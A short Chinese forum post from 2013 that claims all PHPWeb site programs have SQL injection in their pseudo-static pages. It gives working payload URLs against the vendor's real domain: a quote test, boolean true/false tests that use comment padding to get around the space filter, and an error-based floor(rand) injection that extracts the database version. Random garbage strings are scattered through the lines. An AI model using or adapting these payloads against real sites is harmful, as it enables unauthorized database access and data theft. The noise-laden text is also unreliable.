phpweb所有的整站程序伪静态页面都存在sql注入; b( p" K2 @7 J
5 s' e: X0 Z- L
主站:http://phpweb.net/" Q+ D- E: n. {+ A: `" ]
加’检测:
& C. @2 K+ |& ?# X - f0 h! l8 l4 K$ a$ C" ?8 ?
http://www.phpweb.net/down/html/?772′.html2 o" M! u7 F% E( K$ q# J( o& R
/ d1 K- y6 `7 R: L7 H; P+ r
出错
4 |8 Y3 k; X7 P R存在注入。
( y4 z- Q- p0 [) N* L. x' `不能用空格,只能用/*罗" ?* ]! s3 B! w$ |$ f) K0 ?$ G
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
4 o2 G6 o( _; h7 N0 g - j% D4 m( o$ n" P, o
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.7 `; X/ A5 b" T3 `9 H5 c
爆数据库版本:4 v) R+ {, I8 R0 z/ g* i
8 E/ N! [. r& T5 Z4 C9 Q" O) I?% Z& ~& x0 }3 H( g F+ W
1
8 W. q9 C- y$ j+ I3 S& I' p* ?8 D" W1 Dhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
; k6 E7 B7 ~; ?6 W+ A, T# ^! m* Q: g更新日期: 2013-01-03 13:39:50 " c& m4 C n7 R6 ?
|
发表于 2013-1-4 19:46:42
收藏
支持
反对